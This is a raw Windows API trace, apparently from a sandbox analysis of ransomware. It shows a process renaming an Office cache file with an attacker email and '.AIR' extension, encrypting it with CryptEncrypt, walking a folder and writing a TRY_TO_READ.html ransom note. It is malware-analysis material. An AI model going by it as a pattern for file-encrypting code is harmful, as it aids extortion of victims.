	[0082.572] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.575] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x488
	[0082.575] GetProcessHeap () returned 0x540000
	[0082.575] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.575] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=4095519) returned 1
	[0082.575] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x3e7e1f
	[0082.575] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.575] GetProcessHeap () returned 0x540000
	[0082.575] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.575] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.575] WriteFile (in: hFile=0x488, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.577] WriteFile (in: hFile=0x488, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.577] WriteFile (in: hFile=0x488, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.577] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x3e7e1f) returned 0x3a20020
	[0082.578] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x3e7e1f) returned 0x3e10020
	[0082.578] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.578] ReadFile (in: hFile=0x488, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x3e7e1f, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x3e7e1f, lpOverlapped=0x0) returned 1
	[0082.803] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9eeba90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da330
	[0082.803] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.803] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.803] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.803] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.804] GetLastError () returned 0x0
	[0082.804] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9eeba90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0082.804] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.804] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.804] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.804] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.804] GetLastError () returned 0x0
	[0082.804] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1
	[0082.804] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.804] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.804] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.804] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.804] GetLastError () returned 0x0
	[0082.804] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0082.805] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598c88 | out: hHeap=0x540000) returned 1
	[0082.805] WriteFile (in: hFile=0x48c, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0082.806] WriteFile (in: hFile=0x48c, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0082.806] WriteFile (in: hFile=0x48c, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0082.807] CloseHandle (hObject=0x48c) returned 1
	[0082.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb4b8 | out: hHeap=0x540000) returned 1
	[0082.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0082.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0082.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb420 | out: hHeap=0x540000) returned 1
	[0082.807] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1
	[0082.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.807] GetLastError () returned 0x0
	[0082.807] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85142d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xccb88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1
	[0082.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.807] GetLastError () returned 0x0
	[0082.807] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85ab8b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x80760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dwdcw20.dll", cAlternateFileName="")) returned 1
	[0082.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.808] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.808] GetLastError () returned 0x0
	[0082.808] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85f73a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7eda0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dwtrig20.exe", cAlternateFileName="")) returned 1
	[0082.808] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.808] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.808] GetLastError () returned 0x0
	[0082.808] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.VC90.CRT.manifest", cAlternateFileName="MICROS~1.MAN")) returned 1
	[0082.808] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.808] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.808] GetLastError () returned 0x0
	[0082.808] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c333b00, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8c333b00, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe86b5a80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa0200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msvcr90.dll", cAlternateFileName="")) returned 1
	[0082.808] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.808] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.808] GetLastError () returned 0x0
	[0082.808] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7e3b3f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd79282, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeLR.cab", cAlternateFileName="")) returned 1
	[0082.808] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.808] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.808] GetLastError () returned 0x0
	[0082.808] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c4ba40, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x387e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUI.msi", cAlternateFileName="OFFICE~2.MSI")) returned 1
	[0082.808] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.808] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.808] GetLastError () returned 0x0
	[0082.809] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUI.xml", cAlternateFileName="OFFICE~2.XML")) returned 1
	[0082.809] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.809] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584930
	[0082.809] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.809] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584930 | out: hHeap=0x540000) returned 1
	[0082.809] GetLastError () returned 0x0
	[0082.809] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUISet.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1
	[0082.809] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.809] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584930
	[0082.809] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.809] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584930 | out: hHeap=0x540000) returned 1
	[0082.809] GetLastError () returned 0x0
	[0082.809] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUISet.xml", cAlternateFileName="OFFICE~1.XML")) returned 1
	[0082.809] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.809] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584930
	[0082.809] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.809] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584930 | out: hHeap=0x540000) returned 1
	[0082.809] GetLastError () returned 0x0
	[0082.809] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8b16200, ftCreationTime.dwHighDateTime=0x1cac190, ftLastAccessTime.dwLowDateTime=0xc8b16200, ftLastAccessTime.dwHighDateTime=0x1cac190, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetupui.dll", cAlternateFileName="")) returned 1
	[0082.809] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.809] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584930
	[0082.809] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.809] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584930 | out: hHeap=0x540000) returned 1
	[0082.809] GetLastError () returned 0x0
	[0082.809] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77cbb000, ftCreationTime.dwHighDateTime=0x1cac57a, ftLastAccessTime.dwLowDateTime=0x77cbb000, ftLastAccessTime.dwHighDateTime=0x1cac57a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pss10r.chm", cAlternateFileName="")) returned 1
	[0082.809] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.809] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584930
	[0082.809] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.809] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584930 | out: hHeap=0x540000) returned 1
	[0082.809] GetLastError () returned 0x0
	[0082.809] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cab9f00, ftCreationTime.dwHighDateTime=0x1cac8ad, ftLastAccessTime.dwLowDateTime=0x7cab9f00, ftLastAccessTime.dwHighDateTime=0x1cac8ad, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.chm", cAlternateFileName="")) returned 1
	[0082.809] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.809] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584930
	[0082.810] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.810] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584930 | out: hHeap=0x540000) returned 1
	[0082.810] GetLastError () returned 0x0
	[0082.810] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0082.810] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.810] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584930
	[0082.810] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.810] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584930 | out: hHeap=0x540000) returned 1
	[0082.810] GetLastError () returned 0x0
	[0082.810] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ShellUI.MST", cAlternateFileName="")) returned 1
	[0082.810] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.810] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584930
	[0082.810] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0082.810] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584930 | out: hHeap=0x540000) returned 1
	[0082.810] GetLastError () returned 0x0
	[0082.810] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9eeba90, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9eeba90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0082.810] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.810] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.810] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5893c0
	[0082.810] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.810] GetLastError () returned 0x0
